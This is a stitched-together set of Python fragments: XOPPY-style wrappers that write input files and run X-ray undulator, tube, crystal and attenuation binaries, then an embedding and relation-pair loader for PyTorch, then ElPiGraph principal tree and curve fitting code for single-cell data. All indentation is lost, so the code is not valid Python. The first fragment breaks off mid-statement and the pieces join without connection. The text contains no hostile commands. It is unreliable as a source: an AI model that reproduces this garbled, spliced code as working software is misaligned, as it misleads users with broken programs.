f.write("%s\n" % BFILE)
f.write("%g\n" % (PERIOD_BFIELD))
f.write("%d\n" % (NPER_BFIELD))
f.write("%d\n" % (NPTS_BFIELD))
run_external_binary("txt2u", " < txt2u.inp", "File written to disk should be: %s " % BFILE )
input = "\n"
input += ";Magnet parameters\n"
input += "PERIOD=%g NPER=%d NPTS=%d\n" % (PERIOD, NPER, NPTS)
input += "\n"
input += ";Photon energy\n"
input += "EMIN=%g EMAX=%g NE=%d\n" % (EMIN, EMAX, NENERGY)
input += "\n"
input += ";Storage ring\n"
input += "ENERGY=%g CURRENT=%g\n" % (ENERGY, CUR)
input += " SIGX=%g SIGY=%g\n" % (SIGX, SIGY)
input += "SIGX1=%g SIGY1=%g\n" % (SIGX1, SIGY1)
input += "\n"
input += ";Pinhole (mm or mrad)\n"
input += "DISTANCE=%g\n" % D
input += "XPC=%g XPS=%g NXP=%d\n" % (XPC, XPS, NXP)
input += "YPC=%g YPS=%g NYP=%d\n" % (YPC, YPS, NYP)
input += "\n"
input += ";Calculation parameter\n"
input += "MODE=%d NSIG=%d TRAJECTORY=new+keep\n" % (MODE, NSIG)
input += "XSYM=yes HANNING=%d\n" % HANNING
input += "\n"
input += ";Filenames\n"
input += 'BFILE="undul.bf"\n'
input += 'TFILE="undul.traj"\n'
input += "\n"
input += "END\n"
with open("yaup.inp", "wt") as f:
f.write(input)
run_external_binary(binary="yaup", post_command="", info="Output file should be XXX")
with open("u2txt_traj.inp", "wt") as f:
f.write("2\n")
f.write("%s\n" % (TFILE))
f.write("undul_traj.dat\n")
run_external_binary(binary="u2txt", post_command="< u2txt_traj.inp", info="Output file should be undul_traj.dat")
#
# add spectral power and cumulated power
#
results = numpy.loadtxt("yaup-0.out", skiprows=33)
e = results[:,0]
f = results[:,1]
power_in_spectrum = f.sum() * 1e3 * codata.e * (e[1] - e[0])
print("\nPower from integral of spectrum: %8.3f W" % (power_in_spectrum))
codata_mee = codata.m_e * codata.c ** 2 / codata.e # electron mass in eV
gamma = ENERGY * 1e9 / codata_mee
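    # Total power radiated by a planar undulator, the standard analytical expression
    # P[W] = (N/6) * Z0 * I * e * 2*pi*c * gamma^2 * K^2 / lambda_u,
    # with Z0 the impedance of vacuum and lambda_u the period in metres (PERIOD is given in cm).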
ptot = (NPER / 6) * codata.value('characteristic impedance of vacuum') * \
CUR * codata.e * 2 * numpy.pi * codata.c * gamma ** 2 * (K ** 2 ) / (PERIOD * 1e-2)
print("\nTotal power radiated by the undulator with fully opened slits [W]: %g \n" % (ptot))
print("\nRatio Power from integral of spectrum over Total emitted power: %5.4f" % (power_in_spectrum / ptot))
spectral_power = f * codata.e * 1e3
try:
cumulated_power = spectral_power.cumsum() * numpy.abs(e[0] - e[1])
except:
cumulated_power = 0.0
run_external_binary(binary="u2txt", post_command="< u2txt_traj.inp",
info="Output file should be undul_traj.dat")
return e,f,spectral_power,cumulated_power
#
# X-ray tubes
#
# --------------------------------------------------------------------------------------------
# --------------------------------------------------------------------------------------------
def xoppy_calc_xtube_w(VOLTAGE=100.0,RIPPLE=0.0,AL_FILTER=0.0):
print("Inside xoppy_calc_xtube_w. ")
for file in ["tasmip_tmp.dat"]:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
try:
with open("xoppy.inp","wt") as f:
f.write("%f\n%f\n%f\n"%(VOLTAGE,RIPPLE,AL_FILTER))
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'tasmip.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), 'tasmip') + "' < xoppy.inp"
print("Running command '%s' in directory: %s \n"%(command,locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
print("\nOutput file: %s/tasmip_tmp.dat\n" % (locations.home_bin_run()))
return "tasmip_tmp.dat"
except Exception as e:
raise e
def xoppy_calc_xtubes(ITUBE=0,VOLTAGE=30.0):
print("Inside xoppy_calc_xtubes. ")
for file in ["xtubes_tmp.dat"]:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
try:
with open("xoppy.inp","wt") as f:
f.write("%d\n%f\n"%(ITUBE+1,VOLTAGE))
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'xtubes.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), "xtubes") + "' < xoppy.inp"
print("Running command '%s' in directory: %s "%(command, locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
print("\nOutput file: %s/xtubes_tmp.dat\n" % (locations.home_bin_run()))
return os.path.join(locations.home_bin_run(), "xtubes_tmp.dat")
except Exception as e:
raise e
#
# inpro
#
def xoppy_calc_inpro(CRYSTAL_MATERIAL=0,MODE=0,ENERGY=8000.0,MILLER_INDEX_H=1,MILLER_INDEX_K=1,MILLER_INDEX_L=1,\
ASYMMETRY_ANGLE=0.0,THICKNESS=500.0,TEMPERATURE=300.0,NPOINTS=100,SCALE=0,XFROM=-50.0,XTO=50.0):
print("Inside xoppy_calc_xinpro. ")
try:
with open("xoppy.inp", "wt") as f:
f.write("%s\n"% (os.path.join(locations.home_data(), "inpro" + os.sep)))
if MODE == 0:
f.write("+1\n")
elif MODE == 1:
f.write("-1\n")
elif MODE == 2:
f.write("+2\n")
elif MODE == 3:
f.write("-1\n")
else:
f.write("ERROR!!\n")
f.write("%f\n%d\n"%(THICKNESS,CRYSTAL_MATERIAL+1))
f.write("%s\n%f\n"%("EV",ENERGY))
f.write("%d\n%d\n%d\n"%(MILLER_INDEX_H,MILLER_INDEX_K,MILLER_INDEX_L))
f.write("%f\n%f\n%s\n"%(ASYMMETRY_ANGLE,TEMPERATURE, "inpro.dat"))
if SCALE == 0:
f.write("1\n")
else:
f.write("%d\n%f\n%f\n"%(2,XFROM,XTO))
f.write("%d\n"%(NPOINTS))
for file in ["inpro.par","inpro.dat","inpro.spec"]:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'inpro.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), 'inpro') + "' < xoppy.inp"
print("Running command '%s' in directory: %s "%(command, locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
#add SPEC header
txt = open("inpro.dat").read()
outFile = "inpro.spec"
f = open(outFile,"w")
f.write("#F inpro.spec\n")
f.write("\n")
f.write("#S 1 inpro results\n")
f.write("#N 3\n")
f.write("#L Theta-TetaB s-polarized reflectivity p-polarized reflectivity\n")
f.write(txt)
f.close()
print("File written to disk: inpro.dat, inpro.par, inpro.spec")
#show calculated parameters in standard output
txt_info = open("inpro.par").read()
for line in txt_info:
print(line,end="")
return outFile
except Exception as e:
raise e
#
# xcom
#
def xoppy_calc_xcom(NAME="<NAME>",SUBSTANCE=3,DESCRIPTION="SiO2:B2O3:Na2O:Al2O3:K2O",\
FRACTION="0.807:0.129:0.038:0.022:0.004",GRID=1,GRIDINPUT=0,\
GRIDDATA="0.0804:0.2790:0.6616:1.3685:2.7541",ELEMENTOUTPUT=0):
print("Inside xoppy_calc_xxcom. ")
try:
with open("xoppy.inp","wt") as f:
f.write(os.path.join(locations.home_data(), 'xcom')+ os.sep + "\n" )
f.write( NAME+"\n" )
f.write("%d\n"%(1+SUBSTANCE))
if (1+SUBSTANCE) != 4:
f.write( DESCRIPTION+"\n")
if (1+SUBSTANCE) <= 2:
f.write("%d\n"%(1+ELEMENTOUTPUT))
else:
nn = DESCRIPTION.split(":")
mm = FRACTION.split(":")
f.write("%d\n"%( len(nn)))
for i in range(len(nn)):
f.write(nn[i]+"\n")
f.write(mm[i]+"\n")
f.write("1\n")
f.write("%d\n"%(1+GRID))
if (1+GRID) != 1:
f.write("%d\n"%(1+GRIDINPUT))
if (1+GRIDINPUT) == 1:
nn = GRIDDATA.split(":")
f.write("%d\n"%( len(nn)))
for i in nn:
f.write(i+"\n")
if (1+GRID) != 1:
f.write("N\n")
f.write("%s\n" % GRIDDATA)
f.write("1\n")
f.close()
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'xcom.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(),'xcom') + "' < xoppy.inp"
print("Running command '%s' in directory: %s "%(command,locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
# write spec file
if (1+SUBSTANCE) <= 2:
if (1+ELEMENTOUTPUT) == 1:
titles = "Photon Energy [Mev] Coherent scat [b/atom] " \
"Incoherent scat [b/atom] Photoel abs [b/atom] " \
"Pair prod in nucl field [b/atom] Pair prod in elec field [b/atom] " \
"Tot atten with coh scat [b/atom] Tot atten w/o coh scat [b/atom]"
elif (1+ELEMENTOUTPUT) == 2:
titles = "Photon Energy [Mev] Coherent scat [b/atom] " \
"Incoherent scat [b/atom] Photoel abs [b/atom] " \
"Pair prod in nucl field [b/atom] Pair prod in elec field [b/atom] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
elif (1+ELEMENTOUTPUT) == 3:
titles = "Photon Energy [Mev] Coherent scat [cm2/g] " \
"Incoherent scat [cm2/g] Photoel abs [cm2/g] " \
"Pair prod in nucl field [cm2/g] Pair prod in elec field [cm2/g] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
else:
titles = "Photon Energy [Mev] Coherent scat [cm2/g] " \
"Incoherent scat [cm2/g] Photoel abs [cm2/g] " \
"Pair prod in nucl field [cm2/g] Pair prod in elec field [cm2/g] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
else:
titles = "Photon Energy [Mev] Coherent scat [cm2/g] " \
"Incoherent scat [cm2/g] Photoel abs [cm2/g] " \
"Pair prod in nucl field [cm2/g] Pair prod in elec field [cm2/g] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
txt = open("xcom.out").readlines()
# copy to standard output
for line in txt:
print(line,end="")
outFile = "xcom.spec"
f = open(outFile, "w")
f.write("#F xcom.spec\n")
f.write("\n")
f.write("#S 1 xcom results\n")
f.write("#N 8\n")
f.write("#L "+titles+"\n")
for i in txt:
tmp = i.strip(" ")
if tmp[0].isdigit():
f.write(tmp)
else:
f.write("#UD "+tmp)
f.close()
print("File written to disk: xcom.spec")
return outFile
except Exception as e:
raise e
#
# powder_fml
#
def xoppy_calc_powder_fml(
FILE = os.path.join(locations.home_data(), "cif" + os.sep + "icsd_31142_sepiolite_BraunerPreisinger.cif"),
TITLE = "powder pattern using crysFML",
LAMBDA = 1.54056,
JOB = 0,
U = 0.0002,
V = -0.0002,
W = 0.012,
X = 0.0019,
LS = 1900.0,
THMIN = 1.0,
STEP = 0.05,
THMAX = 135.0,
):
files = ["xpowder_fml.par","xpowder_fml.ref","xpowder_fml.out"]
for file in files:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
with open("xoppy.inp", "wt") as f:
f.write("%s\n" % (FILE))
f.write("%s\n" % (TITLE))
f.write("%g\n" % (LAMBDA))
f.write("%s\n" % (JOB))
f.write("%g\n" % (U))
f.write("%g\n" % (V))
f.write("%g\n" % (W))
f.write("%g\n" % (X))
f.write("%g\n" % (LS))
f.write("%g\n" % (THMIN))
f.write("%g\n" % (STEP))
f.write("%s\n" % (THMAX))
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'xpowder_fml.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), 'xpowder_fml') + "' < xoppy.inp"
print("Running | |
import torch
from torch.utils.data.dataset import TensorDataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import embrelassess.vecops as vecops
import pandas as pd
import numpy as np
import logging
import os
import io
import array
import six
def simple_syns(val):
"""normalises an input syncon name by stripping the language
Use this method when loading Vecsigrafo embeddings to avoid having
to specify the language every time, simply refer to syncons by
using the '#' prefix.
"""
return str(val).replace('en#', '#').strip()
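# For example, simple_syns('en#100001') returns '#100001' (hypothetical syncon id), while
# values already using the plain '#' prefix are passed through unchanged apart from stripping
# surrounding whitespace.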
class SwivelAsTorchTextVector(object):
"""torchtext.Vectors compatible object for Swivel embeddings
"""
def __init__(self, vecs_bin_path, vecs_vocab_path,
vecs_dims=300,
unk_init=torch.FloatTensor.zero_,
vocab_map=lambda x: x):
"""Creates a SwivelAsTorchTextVector from bin and vocab files
Args:
vecs_bin_path a .bin file produced by Swivel
vecs_vocab_path a vocab.txt file produced by Swivel
this should be aligned to the vectors in the bin file
unk_init tensor initializer for words out of vocab
vocab_map maps original tokens to new tokens at loading
time. This can be useful to simplify token names or to
avoid clashes when loading multiple embedding spaces.
"""
self.vocab, self.vecs = vecops.read_swivel_vecs(
vecs_bin_path, vecs_vocab_path, vecs_dims)
self.stoi = dict([(vocab_map(s), i) for i, s in
enumerate(self.vocab)])
self.dim = vecs_dims
self.vectors = torch.FloatTensor(self.vecs)
self.unk_init = unk_init
def __getitem__(self, token):
if token in self.stoi:
return self.vectors[self.stoi[token]]
else:
return self.unk_init(torch.FloatTensor(1, self.dim))
class TSVVectors(object):
def __init__(self, name,
sep='\t',
unk_init=torch.Tensor.zero_):
"""Arguments:
name: name of the file that contains the vectors
sep: field separator. By default the tab character
            unk_init (callback): by default, initialize out-of-vocabulary word vectors
to zero vectors; can be any function that takes in a Tensor and
returns a Tensor of the same size
"""
self.unk_init = unk_init
self.logger = logging.getLogger(__name__)
self.load(name, sep=sep)
def __getitem__(self, token):
if token in self.stoi:
return self.vectors[self.stoi[token]]
else:
return self.unk_init(torch.Tensor(1, self.dim))
def load(self, name, sep='\t'):
path = os.path.join(name)
# path_pt = path + '.pt'
if not os.path.isfile(path):
raise RuntimeError('no vectors found at {}'.format(path))
# str call is necessary for Python 2/3 compatibility, since
# argument must be Python 2 str (Python 3 bytes) or
# Python 3 str (Python 2 unicode)
itos, vectors, dim = [], array.array(str('d')), None
# Try to read the whole file with utf-8 encoding.
binary_lines = False
try:
with io.open(path, encoding="utf8") as f:
lines = [line for line in f]
# If there are malformed lines, read in binary mode
# and manually decode each word from utf-8
except:
self.logger.warning("Could not read {} as UTF8 file, "
"reading file as bytes and skipping "
"words with malformed UTF8.".format(path))
with open(path, 'rb') as f:
lines = [line for line in f]
binary_lines = True
self.logger.info("Loading vectors from {}".format(path))
for line in lines:
# Explicitly splitting on "\t" is important, so we don't
# get rid of Unicode non-breaking spaces in the vectors.
entries = line.rstrip().split(sep)
word, entries = entries[0], entries[1:]
if dim is None and len(entries) > 1:
dim = len(entries)
elif len(entries) == 1:
self.logger.warning("Skipping token {} with 1-dimensional "
"vector {}; likely a header".format(word, entries))
continue
elif dim != len(entries):
raise RuntimeError(
"Vector for token {} has {} dimensions, but previously "
"read vectors have {} dimensions. All vectors must have "
"the same number of dimensions.".format(word, len(entries), dim))
if binary_lines:
try:
if isinstance(word, six.binary_type):
word = word.decode('utf-8')
except UnicodeDecodeError:
self.logger.info("Skipping non-UTF8 token {}".format(repr(word)))
continue
vectors.extend(float(x) for x in entries)
itos.append(word)
self.itos = itos
self.stoi = {word: i for i, word in enumerate(itos)}
self.vectors = torch.Tensor(vectors).view(-1, dim)
self.dim = dim
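# Minimal usage sketch (the TSV path is hypothetical). Each line is expected to be
# token<sep>v1<sep>...<sep>vN, and out-of-vocabulary lookups go through unk_init:
#   tsv_vecs = TSVVectors('embeddings.tsv')
#   v = tsv_vecs['word']   # Tensor of size tsv_vecs.dim, or a (1, dim) zero tensor if OOV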
class RandomVectors(object):
"""torchtext.Vecrtors compatible object with random vectors for a given vocabulary
"""
def __init__(self, vocab_path,
unk_init=torch.Tensor.uniform_,
dim=None):
"""Arguments:
vocab_path: path of the vocab file; this may be a file with one token per
line, or a TSV whose first column contains the token names.
unk_init (callback): by default, initialize word vectors
to random uniform vectors between 0 and 1; can be any function that
takes in a Tensor and returns a Tensor of the same size
"""
self.logger = logging.getLogger(__name__)
self.unk_init = unk_init
assert dim, 'a dimension (dim) must be provided'
self.load(vocab_path, dim)
def __getitem__(self, token):
if token in self.stoi:
return self.vectors[self.stoi[token]]
else:
return self.unk_init(torch.Tensor(1, self.dim))
def load(self, vocab_path, dim=None):
path = os.path.join(vocab_path)
# path_pt = path + '.pt'
if not os.path.isfile(path):
raise RuntimeError('no vectors found at {}'.format(path))
# str call is necessary for Python 2/3 compatibility, since
# argument must be Python 2 str (Python 3 bytes) or
# Python 3 str (Python 2 unicode)
itos, vectors = [], array.array(str('d'))
# Try to read the whole file with utf-8 encoding.
with io.open(path, encoding="utf8") as f:
lines = [line for line in f]
self.logger.info("Loading vectors from {}".format(path))
for line in lines:
# Explicitly splitting on "\t" is important, so we don't
# get rid of Unicode non-breaking spaces in the vectors.
entries = line.rstrip().split("\t")
word = entries[0]
tens = torch.Tensor(dim).uniform_(to=2) - 1.0  # uniform in [-1, 1)
entries = tens.tolist()
vectors.extend(float(x) for x in entries)
itos.append(word)
self.itos = itos
self.stoi = {word: i for i, word in enumerate(itos)}
self.vectors = torch.Tensor(vectors).view(-1, dim)
self.dim = dim
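# Minimal usage sketch (the vocab path is hypothetical). Note that the loaded vectors
# are drawn uniformly from [-1, 1), independently of unk_init:
#   rand_vecs = RandomVectors('vocab.txt', dim=300)
#   v = rand_vecs['some_token']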
class VecPairLoader():
"""Generates DataLoaders from a word embedding space and a relation file
On one hand we have word embeddings which need to be loaded. On the other
hand we have TSV word relation files, which provide pairs of words which
belong to some category (as well as negative pairs). For training PyTorch
models, we need to map the words to their embeddings to generate
TensorDatasets, which in practice are used during training as DataLoaders.
This class provides methods for performing these operations.
The embeddings are given by a PyTorch.text Vectors instance.
"""
def __init__(self, torch_vecs):
"""Creates a VecPairLoader based on a torchtext.vocab.Vectors
Args:
torch_vecs a torchtext.vocab.Vectors instance (or compatible)
"""
assert(torch_vecs)
self.vecs = torch_vecs
def vecOrEmpty(self, word):
"""Returns the vector for the word if in vocab, or a zero vector
Returns:
vector: the word's vector if in vocab, otherwise a zero vector
found: 1 if the word was in the vocabulary, 0 otherwise
"""
res = self.vecs[word]
if not (res.shape[0] == self.vecs.dim):
return torch.zeros(self.vecs.dim), 0
else:
return res, 1
def avg_vec(self, compound_word):
"""Returns a vector for a possibly compound_word
If the compound_word is in the vocab, simply returns that vector.
Otherwise, splits the compound word and returns the average of
the individual words.
Returns:
vector for the compound_word
tok_count number of subtokens derived from compound_word
toks_found how many of the subtokens were in the vocabulary
"""
compound_word = str(compound_word)
vec = self.vecs[compound_word]
if (vec.shape[0] == self.vecs.dim):
return vec, 1, 1
else: # word not in vocab
sum = torch.zeros(self.vecs.dim)
words = compound_word.split(' ')
tok_count = len(words)
toks_found = 0
for w in words:
w_vec, w_found = self.vecOrEmpty(w)
sum = sum + w_vec
toks_found = toks_found + w_found
return sum / len(words), tok_count, toks_found
def pairEmbed(self):
def _pairEmbed(dfrow):
par, pt_cnt, pt_fnd = self.avg_vec(dfrow[0])
chi, ct_cnt, ct_fnd = self.avg_vec(dfrow[1])
#print('par type', type(par))
assert par.shape[0] == self.vecs.dim
assert chi.shape[0] == self.vecs.dim
#vec = torch.cat([par, chi])
#print('pair embed', type(vec))
return torch.cat([par, chi]), pt_cnt + ct_cnt, pt_fnd + ct_fnd
return _pairEmbed
def firstEmbed(self):
def _firstEmbed(dfrow):
return self.avg_vec(dfrow[0])
return _firstEmbed
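# Minimal usage sketch (paths are hypothetical): pairEmbed() concatenates both term
# embeddings (2*dim inputs per row), firstEmbed() embeds only the first term.
# Return values are as documented in load_data below:
#   loader = VecPairLoader(SwivelAsTorchTextVector('vecs.bin', 'vocab.txt'))
#   X, Y, n, tok_count, tok_found = loader.load_data('rel_pairs.tsv', loader.pairEmbed())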
def load_data(self, tsv_file, dfrow_handler):
"""Loads pair classification data from a TSV file.
By default, we assume each row contains two vocabulary terms followed
by an integer value for the class of the pair.
Returns:
X FloatTensor of n by k*dim for the input pairs, where k is the number
of terms embedded per row (2 for pairEmbed, 1 for firstEmbed)
Y LongTensor of n elements
n the number of pairs, i.e. size of the dataset
tok_count number of tokens used to provide the embeddings
minimum value is n*k, but could be higher due to compound words
tok_found number of tokens in the vocabulary
maximum value is tok_count, but can be lower if the
tsv_file contains words out of the vocabulary
"""
df = pd.read_csv(tsv_file, header=None, sep='\t')
# print(df.columns.size)
assert df.columns.size >= 3, 'expected at least 3 columns (term, term, class) in %s' % tsv_file
# extract categories (pytorch takes care of 1-hot encoding)
categories = df.loc[:, 2]
Y = torch.LongTensor(categories.values)
# now extract pairs
vec_cnt_fnds = df.apply(dfrow_handler, axis=1)
vecs = vec_cnt_fnds.apply(lambda triple: triple[0])
cnts = vec_cnt_fnds.apply(lambda triple: triple[1])
fnds = vec_cnt_fnds.apply(lambda triple: triple[2])
[Albergante20]_.
epg_mu
Parameter for ElPiGraph, coefficient of ‘bending’ elasticity [Albergante20]_.
epg_trimmingradius
Parameter for ElPiGraph, trimming radius for MSE-based data approximation term [Albergante20]_.
epg_initnodes
numerical 2D matrix, the k-by-m matrix with k m-dimensional positions of the nodes
in the initial step
epg_verbose
show verbose output of epg algorithm
device
Run method on either `cpu` or on `gpu`
plot
Plot the resulting tree.
basis
Basis onto which the resulting tree should be projected.
seed
A numpy random seed.
copy
Return a copy instead of writing to adata.
Returns
-------
adata : anndata.AnnData
if `copy=True` it returns the modified `adata`, else it adds fields to `adata`:
`.uns['epg']`
dictionary containing information from elastic principal curve
`.obsm['X_R']`
soft assignment of cells to principal points
`.uns['graph']['B']`
adjacency matrix of the principal points
`.uns['graph']['F']`
coordinates of principal points in representation space
"""
logg.info(
"inferring a principal circle",
reset=True,
end=" " if settings.verbosity > 2 else "\n",
)
adata = adata.copy() if copy else adata
if Nodes is None:
if adata.shape[0] * 2 > 100:
Nodes = 100
else:
Nodes = int(adata.shape[0] / 2)
logg.hint(
"parameters used \n"
" "
+ str(Nodes)
+ " principal points, mu = "
+ str(epg_mu)
+ ", lambda = "
+ str(epg_lambda)
)
circle_epg(
adata,
Nodes,
use_rep,
ndims_rep,
init,
epg_lambda,
epg_mu,
epg_trimmingradius,
epg_initnodes,
device,
seed,
epg_verbose,
)
if plot:
plot_graph(adata, basis)
return adata if copy else None
def tree_epg(
X,
Nodes: int = None,
init: Optional[DataFrame] = None,
lam: Optional[Union[float, int]] = 0.01,
mu: Optional[Union[float, int]] = 0.1,
trimmingradius: Optional = np.inf,
initnodes: int = None,
device: str = "cpu",
seed: Optional[int] = None,
verbose: bool = True,
):
try:
import elpigraph
except Exception as e:
warnings.warn(
'ElPiGraph package is not installed \
\nPlease use "pip install git+https://github.com/j-bac/elpigraph-python.git" to install it'
)
logg.hint(
"parameters used \n"
" "
+ str(Nodes)
+ " principal points, mu = "
+ str(mu)
+ ", lambda = "
+ str(lam)
)
if seed is not None:
np.random.seed(seed)
if device == "gpu":
import cupy as cp
from cuml.metrics import pairwise_distances
from .utils import cor_mat_gpu
Tree = elpigraph.computeElasticPrincipalTree(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
GPU=True,
verbose=verbose,
)
R = pairwise_distances(
cp.asarray(X.values), cp.asarray(Tree[0]["NodePositions"])
)
R = cp.asnumpy(R)
# Hard assignment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
else:
from .utils import cor_mat_cpu
from sklearn.metrics import pairwise_distances
Tree = elpigraph.computeElasticPrincipalTree(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
verbose=verbose,
)
R = pairwise_distances(X.values, Tree[0]["NodePositions"])
# Hard assignment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
g = igraph.Graph(directed=False)
g.add_vertices(np.unique(Tree[0]["Edges"][0].flatten().astype(int)))
g.add_edges(
pd.DataFrame(Tree[0]["Edges"][0]).astype(int).apply(tuple, axis=1).values
)
# mat = np.asarray(g.get_adjacency().data)
# mat = mat + mat.T - np.diag(np.diag(mat))
# B=((mat>0).astype(int))
B = np.asarray(g.get_adjacency().data)
emptynodes = np.argwhere(R.max(axis=0) == 0).ravel()
sel = ~np.isin(np.arange(R.shape[1]), emptynodes)
B = B[sel, :][:, sel]
R = R[:, sel]
F = Tree[0]["NodePositions"].T[:, sel]
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
def reconnect():
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
distmat = np.triu(pairwise_distances(F[:, tips].T))
distmat = pd.DataFrame(distmat, columns=tips, index=tips)
distmat[distmat == 0] = np.inf
row, col = np.unravel_index(np.argmin(distmat.values), distmat.shape)
i, j = distmat.index[row], distmat.columns[col]
B[i, j] = 1
B[j, i] = 1
return B
if len(emptynodes) > 0:
logg.info(" removed %d non assigned nodes" % (len(emptynodes)))
recon = len(np.unique(np.array(g.clusters().membership))) > 1
while recon:
B = reconnect()
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
recon = len(np.unique(np.array(g.clusters().membership))) > 1
forks = np.argwhere(np.array(g.degree()) > 2).flatten()
graph = {
"B": B,
"R": R,
"F": Tree[0]["NodePositions"].T,
"tips": tips,
"forks": forks,
"cells_fitted": X.index.tolist(),
"metrics": "euclidean",
}
Tree[0]["Edges"] = list(Tree[0]["Edges"])[0]
return graph, Tree[0]
def curve_epg(
adata: AnnData,
Nodes: int = None,
use_rep: str = None,
ndims_rep: Optional[int] = None,
init: Optional[DataFrame] = None,
lam: Optional[Union[float, int]] = 0.01,
mu: Optional[Union[float, int]] = 0.1,
trimmingradius: Optional = np.inf,
initnodes: int = None,
device: str = "cpu",
seed: Optional[int] = None,
verbose: bool = True,
):
try:
import elpigraph
except Exception as e:
warnings.warn(
'ElPiGraph package is not installed \
\nPlease use "pip install git+https://github.com/j-bac/elpigraph-python.git" to install it'
)
X, use_rep = get_data(adata, use_rep, ndims_rep)
if seed is not None:
np.random.seed(seed)
if device == "gpu":
import cupy as cp
from .utils import cor_mat_gpu
from cuml.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCurve(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
GPU=True,
verbose=verbose,
)
R = pairwise_distances(
cp.asarray(X.values), cp.asarray(Curve[0]["NodePositions"])
)
R = cp.asnumpy(R)
# Hard assignment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
else:
from .utils import cor_mat_cpu
from sklearn.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCurve(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
verbose=verbose,
)
R = pairwise_distances(X.values, Curve[0]["NodePositions"])
# Hard assignment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
g = igraph.Graph(directed=False)
g.add_vertices(np.unique(Curve[0]["Edges"][0].flatten().astype(int)))
g.add_edges(
pd.DataFrame(Curve[0]["Edges"][0]).astype(int).apply(tuple, axis=1).values
)
# mat = np.asarray(g.get_adjacency().data)
# mat = mat + mat.T - np.diag(np.diag(mat))
# B=((mat>0).astype(int))
B = np.asarray(g.get_adjacency().data)
emptynodes = np.argwhere(R.max(axis=0) == 0).ravel()
sel = ~np.isin(np.arange(R.shape[1]), emptynodes)
B = B[sel, :][:, sel]
R = R[:, sel]
F = Curve[0]["NodePositions"].T[:, sel]
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
def reconnect():
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
distmat = np.triu(pairwise_distances(F[:, tips].T))
distmat = pd.DataFrame(distmat, columns=tips, index=tips)
distmat[distmat == 0] = np.inf
row, col = np.unravel_index(np.argmin(distmat.values), distmat.shape)
i, j = distmat.index[row], distmat.columns[col]
B[i, j] = 1
B[j, i] = 1
return B
if len(emptynodes) > 0:
logg.info(" removed %d non assigned nodes" % (len(emptynodes)))
recon = len(np.unique(np.array(g.clusters().membership))) > 1
while recon:
B = reconnect()
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
recon = len(np.unique(np.array(g.clusters().membership))) > 1
forks = np.argwhere(np.array(g.degree()) > 2).flatten()
graph = {
"B": B,
"F": Curve[0]["NodePositions"].T,
"tips": tips,
"forks": forks,
"metrics": "euclidean",
"use_rep": use_rep,
"ndims_rep": ndims_rep,
}
Curve[0]["Edges"] = list(Curve[0]["Edges"])[0]
adata.uns["graph"] = graph
adata.uns["epg"] = Curve[0]
adata.obsm["X_R"] = R
logg.info(" finished", time=True, end=" " if settings.verbosity > 2 else "\n")
logg.hint(
"added \n"
" .uns['epg'] dictionnary containing inferred elastic curve generated from elpigraph.\n"
" .obsm['X_R'] hard assignment of cells to principal points.\n"
" .uns['graph']['B'] adjacency matrix of the principal points.\n"
" .uns['graph']['F'], coordinates of principal points in representation space."
)
return adata
def circle_epg(
adata: AnnData,
Nodes: int = None,
use_rep: str = None,
ndims_rep: Optional[int] = None,
